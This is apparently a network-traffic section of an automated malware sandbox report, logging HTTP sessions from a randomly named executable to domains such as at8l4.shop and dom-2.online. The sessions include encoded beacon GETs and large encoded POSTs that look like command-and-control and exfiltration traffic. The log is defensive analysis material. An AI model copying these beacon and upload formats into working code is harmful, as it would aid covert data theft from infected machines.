                                                                                  vary: Accept-Encoding
                                                                                  date: Tue, 27 Aug 2024 15:49:07 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a [TRUNCATED]
                                                                                  Data Ascii: e93[sHy]u&6lzK&l&!Nma)XCw===qn.JV!^R?[n?7ql.gs'>D|u>6y|<*@`=C64`/IbrbP7\rQsV'k'&wEd q&ez/dyggq~$V6rX|0BKaMM<OsN8?H8'H}z65midd7NvqSjrmBXLvEa0|BWF_"~O/{{}HW=IL=n|<~On;XWh~q[|vmG+~%_9i@|4?YXqLL[^j|'t}kD@(LaK949IhI}+q_p%_\HD8gD\'Kug?8'DJ%p"{rgz)yf8IHz?JDX=Y(n`kA6>AU#F+TIlp%%E"=f}zUqJ'TtWQdun#ZA(JuNFF$I#K'Xu}J>oiaOQTWUswr[%t+`AH%"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.11.2049843148.135.49.178805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:08.639863968 CEST533OUTGET /w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.policydetails.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:49:09.210969925 CEST501INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/8.1.29
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  x-redirect-by: WordPress
                                                                                  location: http://policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs=
                                                                                  content-length: 0
                                                                                  date: Tue, 27 Aug 2024 15:49:09 GMT
                                                                                  server: LiteSpeed


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.11.20498443.33.130.190805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:22.618396044 CEST782OUTPOST /euco/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.at8l4.shop
                                                                                  Origin: http://www.at8l4.shop
                                                                                  Referer: http://www.at8l4.shop/euco/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 79 48 39 46 2f 32 68 6a 64 4f 51 63 32 73 4f 58 78 45 39 69 4c 5a 7a 44 63 71 48 50 2f 44 47 34 5a 78 37 7a 47 6e 67 69 4a 70 45 56 35 65 69 51 66 53 52 34 34 64 32 46 75 6f 5a 6e 32 37 67 32 76 49 58 5a 34 35 68 65 58 4b 30 42 6a 62 31 2f 77 66 43 78 66 58 59 6e 4f 41 6a 56 71 30 6f 44 36 70 43 6b 51 52 50 57 41 68 73 43 41 45 79 48 46 69 32 38 6e 36 37 6f 57 74 46 78 43 4b 65 54 53 7a 47 67 77 51 44 6b 68 6b 59 33 2b 77 52 33 66 7a 67 6e 46 37 45 66 55 4d 44 36 79 37 6c 73 74 67 54 34 73 4b 32 6e 49 58 45 43 65 54 42 62 73 35 58 56 4d 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=LNohcw8eN2+3yH9F/2hjdOQc2sOXxE9iLZzDcqHP/DG4Zx7zGngiJpEV5eiQfSR44d2FuoZn27g2vIXZ45heXK0Bjb1/wfCxfXYnOAjVq0oD6pCkQRPWAhsCAEyHFi28n67oWtFxCKeTSzGgwQDkhkY3+wR3fzgnF7EfUMD6y7lstgT4sK2nIXECeTBbs5XVMg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.11.20498453.33.130.190805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:25.256726027 CEST1122OUTPOST /euco/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.at8l4.shop
                                                                                  Origin: http://www.at8l4.shop
                                                                                  Referer: http://www.at8l4.shop/euco/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 7a 6e 74 46 39 56 35 6a 61 75 51 62 35 4d 4f 58 37 6b 39 6d 4c 5a 2f 44 63 75 66 35 2f 78 79 34 61 51 4c 7a 48 69 41 69 4b 70 45 56 32 2b 6a 62 42 69 51 30 34 64 37 34 75 70 6c 6e 32 34 63 32 75 39 44 5a 70 70 68 64 64 71 30 4f 6b 62 31 79 37 2f 43 6e 66 58 63 56 4f 46 4c 56 71 6b 4d 44 39 72 71 6b 42 31 6a 56 45 42 73 4d 52 55 79 59 4c 79 32 2b 6e 39 7a 67 57 73 4d 45 43 35 43 54 54 54 6d 67 7a 51 44 6e 34 6b 59 4b 6d 41 51 55 53 53 42 30 46 37 49 66 46 39 7a 35 30 5a 5a 43 74 53 50 65 30 61 57 6c 61 48 45 6f 56 77 73 62 2f 4b 69 72 54 46 46 68 54 51 49 58 50 47 6b 37 57 69 74 6d 49 6c 6f 71 4f 61 34 4e 49 62 44 62 51 36 67 42 50 58 38 39 54 75 54 53 55 57 4f 64 44 54 30 48 76 7a 68 4b 61 76 59 6a 62 6e 6a 46 62 39 4e 37 4a 75 47 70 62 6f 43 74 35 4a 50 4c 65 4a 55 71 73 6f 64 2b 66 61 64 65 47 4f 59 2b 68 52 70 4c 4d 64 38 71 56 32 49 55 5a 58 34 78 50 71 6a 35 79 78 50 54 56 55 64 51 6a 73 2b 6d 46 74 34 31 65 38 6f 2f 66 36 78 4d 6e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=LNohcw8eN2+3zntF9V5jauQb5MOX7k9mLZ/Dcuf5/xy4aQLzHiAiKpEV2+jbBiQ04d74upln24c2u9DZpphddq0Okb1y7/CnfXcVOFLVqkMD9rqkB1jVEBsMRUyYLy2+n9zgWsMEC5CTTTmgzQDn4kYKmAQUSSB0F7IfF9z50ZZCtSPe0aWlaHEoVwsb/KirTFFhTQIXPGk7WitmIloqOa4NIbDbQ6gBPX89TuTSUWOdDT0HvzhKavYjbnjFb9N7JuGpboCt5JPLeJUqsod+fadeGOY+hRpLMd8qV2IUZX4xPqj5yxPTVUdQjs+mFt41e8o/f6xMngUzMhpVk1Vmb6eYE5PX7Z1/ueWTfXDKEuUhZ5aWckhKz1/MSpT5nhPjw9940/GyPd3spbiUlIH3+t+xVmVWEua27OEt1Gj540x+p9bAJKU+yTsPOMgdOxikC0w+ng81eScSuSvqZt9+3TFRb5Y4TI9DFTK3zRyVVEuxFWhvR3LroWtwe/8fzjQvEpqV1SQYS1CBUARwMw7bK2A=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.11.20498463.33.130.190805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:27.889471054 CEST2578OUTPOST /euco/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.at8l4.shop
                                                                                  Origin: http://www.at8l4.shop
                                                                                  Referer: http://www.at8l4.shop/euco/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 7a 6e 74 46 39 56 35 6a 61 75 51 62 35 4d 4f 58 37 6b 39 6d 4c 5a 2f 44 63 75 66 35 2f 78 71 34 5a 69 54 7a 47 45 49 69 46 4a 45 56 37 65 6a 59 42 69 52 75 34 64 7a 38 75 70 70 52 32 2b 51 32 76 73 54 5a 38 50 64 64 59 71 30 50 6f 37 31 38 77 66 43 56 66 58 5a 53 4f 42 69 69 71 30 51 44 36 72 61 6b 51 30 6a 57 62 68 73 43 52 55 79 45 42 69 32 41 6e 38 6a 57 57 73 77 45 43 36 6d 54 54 68 4f 67 78 6a 62 6e 67 6b 59 4a 76 67 51 62 59 79 42 37 46 2f 6f 74 46 39 7a 44 30 62 31 43 74 53 76 65 6c 71 71 71 5a 6e 45 6f 59 51 73 59 70 4c 65 76 54 46 59 38 54 51 51 58 50 47 4d 37 55 43 74 6d 4d 30 6f 74 44 71 34 48 4d 62 44 79 62 61 38 5a 50 52 51 70 54 75 33 53 55 47 61 64 43 67 63 48 2f 67 35 4b 54 76 59 74 47 58 6a 61 51 64 4e 2f 4a 74 2f 47 62 6f 69 62 35 4a 37 4c 66 70 30 71 70 4a 64 35 53 71 64 55 4d 75 59 52 6c 52 73 4b 4d 64 74 7a 56 32 49 2b 5a 57 38 78 50 61 54 35 7a 77 50 51 55 6b 63 35 32 63 2b 33 50 4e 45 4a 65 34 77 33 66 2f 78 63 6e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=LNohcw8eN2+3zntF9V5jauQb5MOX7k9mLZ/Dcuf5/xq4ZiTzGEIiFJEV7ejYBiRu4dz8uppR2+Q2vsTZ8PddYq0Po718wfCVfXZSOBiiq0QD6rakQ0jWbhsCRUyEBi2An8jWWswEC6mTThOgxjbngkYJvgQbYyB7F/otF9zD0b1CtSvelqqqZnEoYQsYpLevTFY8TQQXPGM7UCtmM0otDq4HMbDyba8ZPRQpTu3SUGadCgcH/g5KTvYtGXjaQdN/Jt/Gboib5J7Lfp0qpJd5SqdUMuYRlRsKMdtzV2I+ZW8xPaT5zwPQUkc52c+3PNEJe4w3f/xcnjYzKxpVv2t5MaefNZP7lp1ouebCfS7FFfohapKWY0hJhl/2bJTzjhPjw9xK0/KyPMPsorSUu7f3ud/bVmUNEuWz7OMH1Dqu43d+wMLAKOA/2jsKKMgKARmzCwQ2nhALeFsStS/qdt9x8TFKMJYqXIxlFTXKzR2FVE2xBxIpLn/m30thX9437y4QJ5um0wYwbTmRfSBNWzbqXyPZ25FV9kop1cSFFyGjfCbJ6ufGPgIGDJFlD0NIQ3NYVxrG8O72YddqIQvKQ2aPpNiuIF+CPssVx6GSzJ8HSBnYyH9wztTlN7WxUs+3JDNrolHARHWkzM5HAzsfwqIiBCGkASYsWV/kfG6Mcn2HbPiXEMixZ/pQozhmIDRmiDMSOQyI2H0RT6jacJsvHjTY0d5NtYXj5JNqDTatcpV158J8KYatE+nPlRmczV0N1J6Pv5e5wUlQkYfDhGVIwH/388SBa3JBjNgbpPOka0iaSaeXOPqbmDrcMRf4xRUwVvMSN2OnobKpK3u9u+nc1xyXH7gRXfDGqxFdO+S3qRn/k3h4aG8Y2aSnMD2MHs6ifQTIvnxySvIuIqwaXZYKpWMp0k+GSFkY+XKSAjeVnMZLTORkc5j71NG9WHilG53CNdlDST4Ek5Q/mvj2PFt7hP+yQ6C3rTH2GSTpGWcdsDZwiuE [TRUNCATED]
                                                                                  Aug 27, 2024 17:49:27.889492035 CEST3867OUTData Raw: 39 39 59 74 67 5a 49 48 64 45 76 73 6c 43 52 44 2f 58 59 7a 35 77 55 6f 6f 78 4e 38 4d 6c 6b 48 42 57 61 52 44 6c 49 42 45 7a 35 45 61 65 42 54 36 62 36 41 48 76 4b 53 41 72 32 31 37 52 74 37 5a 77 37 33 2b 67 74 6b 63 70 4b 70 57 57 74 4e 6e 4c
                                                                                  Data Ascii: 99YtgZIHdEvslCRD/XYz5wUooxN8MlkHBWaRDlIBEz5EaeBT6b6AHvKSAr217Rt7Zw73+gtkcpKpWWtNnL328qOfP6riBWtYwpK2WZCUI+bXTuMZohbTgsugPuaFtAPFxKlhTTZr7Ls1yRf2bBGM2DH6HQSJFOJZ+GtsI9ihw94TVMrF9O5Skh+iXMZL2IohwTG+uQc20iDJYnkO8V315mkt88jpKMeHQXDp8CTT7lWjiolSZOZ
                                                                                  Aug 27, 2024 17:49:27.889539003 CEST6445OUTData Raw: 61 36 51 49 4f 49 73 50 4d 6a 73 34 42 47 44 7a 37 62 44 73 52 47 58 4a 61 43 4f 48 5a 35 69 32 76 32 54 4a 6b 70 46 35 2f 7a 2f 51 4b 42 32 59 4f 42 59 70 57 53 57 6d 75 49 65 45 79 30 68 53 4c 55 6c 58 78 70 56 61 54 6f 65 44 69 79 33 30 37 46
                                                                                  Data Ascii: a6QIOIsPMjs4BGDz7bDsRGXJaCOHZ5i2v2TJkpF5/z/QKB2YOBYpWSWmuIeEy0hSLUlXxpVaToeDiy307FostlaRrYXcNbb2aNCuXceuanQPJ5pjG9GacvPDw+Xw/2VMb6cmZye7Ymq54MvEsW8kb0gsd5PJVHNHf6m70OuvnPz/He1LXaF2avWeEpko/y+02FbJfLE9BPdPnPbA6dKyihaUudD7TZl0sLO2mE/z/zy9E0YQmqZ
                                                                                  Aug 27, 2024 17:49:27.990492105 CEST1289OUTData Raw: 69 73 35 51 47 6f 47 6c 34 63 51 31 6b 55 78 65 6f 6c 59 67 4c 7a 2b 52 45 71 71 50 39 36 77 44 43 64 64 6a 2f 38 36 54 6e 76 61 5a 6c 4e 74 78 39 68 2f 52 69 66 72 5a 64 38 48 33 78 2f 54 76 4e 78 2b 56 6b 66 53 49 46 34 38 49 61 37 52 49 35 54
                                                                                  Data Ascii: is5QGoGl4cQ1kUxeolYgLz+REqqP96wDCddj/86TnvaZlNtx9h/RifrZd8H3x/TvNx+VkfSIF48Ia7RI5Tb8e77Hzl28tTwMh9F9HyrfU3v14VVeS79TTEsAd+0sIxMwSYYxfRlxs5/1dtA3C4s/6jeNzk8ISOEp3mIBefRKjm0sK+p/TWwoHwJl73mJoNy+kGScdw1SSPQGUrmb2+QS9jlCrw0UDIAozZj21jv/GVatONyWI6Y
                                                                                  Aug 27, 2024 17:49:27.990663052 CEST10312OUTData Raw: 4d 51 48 55 58 4c 4f 65 61 71 39 61 52 65 35 2b 7a 74 69 6a 74 6c 33 73 41 61 42 59 39 59 2f 4a 4d 53 46 66 30 32 70 6f 61 57 64 49 68 78 59 57 57 74 55 2b 2b 43 45 54 35 54 59 2f 67 4d 68 4a 55 2f 6f 71 41 61 50 79 4b 65 6c 45 6c 55 33 39 56 4d
                                                                                  Data Ascii: MQHUXLOeaq9aRe5+ztijtl3sAaBY9Y/JMSFf02poaWdIhxYWWtU++CET5TY/gMhJU/oqAaPyKelElU39VM67nj8hmX/QlDkcOzKohCHUhB4tpFWrJuFa9aDC9CX+HVRMAqmgjJUknVqNvV3FnTXglfvGLZPhwiOpMQXPYpwMaHqZ25GG0eErDeQc8tcIEGp0/8zfcAB5Ur+saRLFu8JFWqgYREYiWJkeZh49ZkrPmx4T93nHRV8
                                                                                  Aug 27, 2024 17:49:27.990858078 CEST6445OUTData Raw: 52 30 62 53 63 75 74 70 36 64 38 6d 6b 32 4d 7a 37 62 4a 43 30 67 62 49 50 72 37 6d 44 49 79 73 65 74 72 4d 39 63 65 7a 74 62 48 49 69 45 65 77 36 74 46 76 66 4f 45 6d 45 74 65 49 6e 43 49 31 6a 6c 35 56 5a 65 36 6d 66 6e 52 30 68 67 51 69 7a 6c
                                                                                  Data Ascii: R0bScutp6d8mk2Mz7bJC0gbIPr7mDIysetrM9ceztbHIiEew6tFvfOEmEteInCI1jl5VZe6mfnR0hgQizlImSgP9TjG8Qo81IxUB4OOYwmvO7HdZdRrHMR/FWbOQ6yskX/t6B6uDmAKlMtE5OBtNi5WzujmucM8+qGGi3qV1ZmL25XDijx+6YY/9V0h2UMcUaTChTCbAP39vuL6p/dI/LpOQihRqCpHgCtL9hlVXzpsZp+XMjy3
                                                                                  Aug 27, 2024 17:49:27.991003036 CEST7734OUTData Raw: 6d 4e 35 36 77 77 73 4b 64 4a 2f 57 30 53 7a 62 71 38 35 43 53 64 33 35 68 6b 5a 31 38 5a 71 49 77 39 7a 31 4e 41 2b 6f 62 6e 63 50 32 4b 59 66 30 38 34 59 6a 32 59 75 2b 65 48 56 75 78 31 58 52 57 50 48 52 67 46 46 72 48 6c 30 6b 76 70 30 50 42
                                                                                  Data Ascii: mN56wwsKdJ/W0Szbq85CSd35hkZ18ZqIw9z1NA+obncP2KYf084Yj2Yu+eHVux1XRWPHRgFFrHl0kvp0PBeiGu6MuEwW0pP7QCcxVZcKXgeNUjd0OrVkySN7Gx/Kmj/iHLGGHMylcGXc8J0+hzSfYemANosdFOr22W9LO70DoYJEN7pNAxM+fDOEUrTIO6bQQuUc3SYPK5YrY06fzaYzRs2UmW/MuvmTNK4+N94VqzyUlWdDdEQ
                                                                                  Aug 27, 2024 17:49:28.091774940 CEST2578OUTData Raw: 38 44 76 53 4f 4c 32 4a 4e 64 32 41 4f 71 43 35 69 2b 52 69 6d 30 58 53 51 59 50 56 56 64 4d 4d 6b 5a 41 56 53 41 66 6e 41 4b 52 7a 46 5a 30 46 4b 68 79 49 50 46 71 41 76 46 4a 64 30 67 63 6d 6f 52 72 73 54 56 67 6f 48 79 46 2b 6f 4a 78 33 34 37
                                                                                  Data Ascii: 8DvSOL2JNd2AOqC5i+Rim0XSQYPVVdMMkZAVSAfnAKRzFZ0FKhyIPFqAvFJd0gcmoRrsTVgoHyF+oJx347wqU1LwgcuiW/kv0rw7qQaafhKkAiMxzN1SFMz7V7B2uKpsHt1pWjhxVfakbceWP89SeK8zPvZh48gt7jXPoCsV1PpLPVV8vO2pKPANvfArzNuObOHkKh14JfUEwKdbFlltfS70VBN8QgsAW+RCC39fNcIC0PuO25e
                                                                                  Aug 27, 2024 17:49:28.091944933 CEST7734OUTData Raw: 53 56 34 64 58 38 5a 70 5a 6c 49 31 49 77 47 68 77 69 43 41 30 37 2b 63 50 39 74 42 6a 67 4b 39 69 69 39 32 59 63 47 69 2b 72 79 50 58 73 2f 66 77 56 45 46 43 32 31 44 44 69 68 72 69 6d 6a 75 49 59 55 4f 4b 59 4c 68 67 71 57 45 32 52 6a 2b 4f 6a
                                                                                  Data Ascii: SV4dX8ZpZlI1IwGhwiCA07+cP9tBjgK9ii92YcGi+ryPXs/fwVEFC21DDihrimjuIYUOKYLhgqWE2Rj+OjHDWBr8EnV12dU+AXFbdpMF4wzzfNj0ZhSW3VgQ+OcZWuE0xZg5WqFX9QhKh9K5Q8x5lSj1BtZorm+oOs70gtW6QweH9ZOOTFeRG/uK8IPa8RvIzIIDFUrpIdDZ1MDZEUPf4ZgL60Qkcb3z2k8mNy4O7BQR/4WtdWR
                                                                                  Aug 27, 2024 17:49:28.091993093 CEST3867OUTData Raw: 75 62 6c 6a 61 74 36 42 74 34 51 4d 31 67 43 56 76 41 48 31 4f 52 37 79 59 74 53 52 4e 44 2f 52 4f 65 6b 72 42 38 71 44 70 44 79 4d 37 5a 73 2f 6a 61 52 54 61 49 42 35 64 46 2f 55 36 58 45 4d 49 67 53 68 35 5a 6b 50 2f 58 4a 70 6c 2f 65 6c 64 64
                                                                                  Data Ascii: ubljat6Bt4QM1gCVvAH1OR7yYtSRND/ROekrB8qDpDyM7Zs/jaRTaIB5dF/U6XEMIgSh5ZkP/XJpl/elddW4ib+D446BkU1x5B75fs3GvZUk1stv5MKrBr3fJMNmlfkRyff9bjPt47NtF7/Yu9rARNqQz+vqhe5VNiUv9K1H6qeqKF3Zqgk4qQjJbflcCz2UteVFnvZ1BVrmdHSYFdDZ/kyTw+SWzdtv2eNqAzRjTwbN6CogSxp
                                                                                  Aug 27, 2024 17:49:28.092154980 CEST670OUTData Raw: 35 6c 54 77 6b 59 49 49 74 79 6b 4e 61 30 4c 33 4c 5a 64 41 36 48 4c 77 6f 76 6b 74 52 43 34 55 58 65 58 64 6f 30 77 6d 58 74 49 31 31 6d 39 65 76 37 61 6c 6b 58 46 34 4b 76 6d 53 41 41 55 66 6e 42 65 4e 65 51 59 38 41 69 6a 43 51 4c 62 39 69 72
                                                                                  Data Ascii: 5lTwkYIItykNa0L3LZdA6HLwovktRC4UXeXdo0wmXtI11m9ev7alkXF4KvmSAAUfnBeNeQY8AijCQLb9irqUdRZZzj9F6QY27sxwxwxb7g/UcktfpmlJXfYzDkhs72olDmVJOXXK223hz1vZK/aTz4svbkwWe/L7t6lrCxkOMPPODpTnPJPXoaD84iAMGBcRkfg+r/XvdPzCnyiNpiWf6P9oN8ABHYYXq1hRPmreobf3LTmFbSE


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.11.20498473.33.130.190805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:30.525892973 CEST523OUTGET /euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.at8l4.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:49:30.628740072 CEST397INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Tue, 27 Aug 2024 15:49:30 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 257
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 47 50 41 42 66 47 64 4f 4c 46 47 31 34 6e 34 51 67 6e 42 69 5a 2b 42 73 79 49 76 72 7a 6a 56 44 44 4c 79 76 51 76 36 61 75 7a 48 69 4e 33 62 2f 61 57 73 6d 47 4c 34 4a 2f 4d 2b 32 59 52 56 72 2f 34 37 6b 32 5a 6c 70 70 72 77 6c 75 76 71 74 6f 59 70 69 64 72 4a 56 73 38 73 71 32 61 4b 78 5a 42 63 49 4b 79 36 56 32 41 68 7a 30 72 4b 56 4c 47 58 6d 42 47 59 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.11.2049848199.59.243.226805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:35.858144999 CEST788OUTPOST /i0bg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dom-2.online
                                                                                  Origin: http://www.dom-2.online
                                                                                  Referer: http://www.dom-2.online/i0bg/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
